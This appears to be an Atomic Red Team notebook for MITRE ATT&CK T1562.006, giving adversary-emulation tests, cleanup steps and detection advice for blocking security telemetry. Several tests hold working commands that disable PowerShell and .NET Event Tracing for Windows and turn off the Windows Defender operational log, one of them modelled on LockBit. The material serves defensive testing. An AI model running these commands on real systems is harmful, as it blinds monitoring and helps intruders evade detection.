# T1562.006 - Indicator Blocking
An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

For example, adversaries may modify the `File` value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging) 

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow on behaviors (Citation: LemonDuck).

## Atomic Tests

### Atomic Test #1 - Auditing Configuration Changes on Linux HostEmulates modification of auditd configuration files
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf
if [ -f "/etc/auditd.conf" ];
then sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf
else sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf
fi 
sed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 1

#### Cleanup: 
```bash
sed -i '$ d' /etc/audisp/audispd.conf
if [ -f "/etc/auditd.conf" ];
then sed -i '$ d' /etc/auditd.conf
else sed -i '$ d' /etc/audit/auditd.conf
fi
sed -i '$ d' /etc/libaudit.conf
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Auditing Configuration Changes on FreeBSD HostEmulates modification of auditd configuration files
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
echo '#art_test_1562_006_1' >> /etc/security/audit_event
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 2

#### Cleanup: 
```sh
sed -i "" '/#art_test_1562_006_1/d' /etc/security/audit_event
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Logging Configuration Changes on Linux HostEmulates modification of syslog configuration.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `bash`
```bash
if [ -f "/etc/syslog.conf" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf
fi
if [ -f "/etc/rsyslog.conf" ];
then sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf
fi
if [ -f "/etc/syslog-ng/syslog-ng.conf" ];
then sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf
fi
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 3

#### Cleanup: 
```bash
if [ -f "/etc/syslog.conf" ];
then sed -i '$ d' /etc/syslog.conf
fi
if [ -f "/etc/rsyslog.conf" ];
then sed -i '$ d' /etc/rsyslog.conf
fi
if [ -f "/etc/syslog-ng/syslog-ng.conf" ];
then sed -i '$ d' /etc/syslog-ng/syslog-ng.conf
fi
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 3 -Cleanup

### Atomic Test #4 - Logging Configuration Changes on FreeBSD HostEmulates modification of syslog configuration.
**Supported Platforms:** linux
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `sh`
```sh
if [ -f "/etc/syslog.conf" ];
then echo '#art_test_1562_006_2' >> /etc/syslog.conf
fi
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 4

#### Cleanup: 
```sh
if [ -f "/etc/syslog.conf" ];
then sed -i "" '/#art_test_1562_006_2/d' /etc/syslog.conf
fi
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Disable Powershell ETW Provider - Windows
This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.
**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: PSExec must be installed on the machine.
##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe") {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip"
expand-archive -literalpath "PathToAtomicsFolder\..\ExternalPayloads\PStools.zip" -destinationpath "PathToAtomicsFolder\..\ExternalPayloads\pstools" -force
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe" -accepteula -i -s cmd.exe /c logman update trace "EventLog-Application" --p "Microsoft-Windows-Powershell" -ets```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 5

#### Cleanup: 
```powershell
cmd /c "PathToAtomicsFolder\..\ExternalPayloads\pstools\PsExec.exe" -i -s cmd.exe /c logman update trace "EventLog-Application" -p "Microsoft-Windows-Powershell" -ets```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 5 -Cleanup

### Atomic Test #6 - Disable .NET Event Tracing for Windows Via Registry (cmd)Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
REG ADD HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /t REG_DWORD /d 0```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 6

#### Cleanup: 
```cmd
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > nul 2>&1```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 6 -Cleanup

### Atomic Test #7 - Disable .NET Event Tracing for Windows Via Registry (powershell)Disables ETW for the .NET Framework using PowerShell to update the Windows registry**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty -Path HKLM:\Software\Microsoft\.NETFramework -Name ETWEnabled -Value 0 -PropertyType "DWord" -Force```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 7

#### Cleanup: 
```powershell
REG DELETE HKLM\Software\Microsoft\.NETFramework /v ETWEnabled /f > $null 2>&1```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 7 -Cleanup

### Atomic Test #8 - LockBit Black - Disable the ETW Provider of Windows Defender -cmdAn adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /t REG_DWORD /d 0 /f
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 8

#### Cleanup: 
```cmd
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" /v Enabled /f >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 8 -Cleanup

### Atomic Test #9 - LockBit Black - Disable the ETW Provider of Windows Defender -PowershellAn adversary can disable the ETW Provider of Windows Defender,
so nothing would be logged to Microsoft-Windows-Windows-Defender/Operational anymore.
https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
New-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled  -PropertyType DWord -Value 0 -Force
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 9

#### Cleanup: 
```powershell
Remove-ItemProperty "HKLM:\Software\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Windows Defender/Operational" -Name Enabled -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1562.006 -TestNumbers 9 -Cleanup

## Detection
Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.

Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: <code>HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}</code>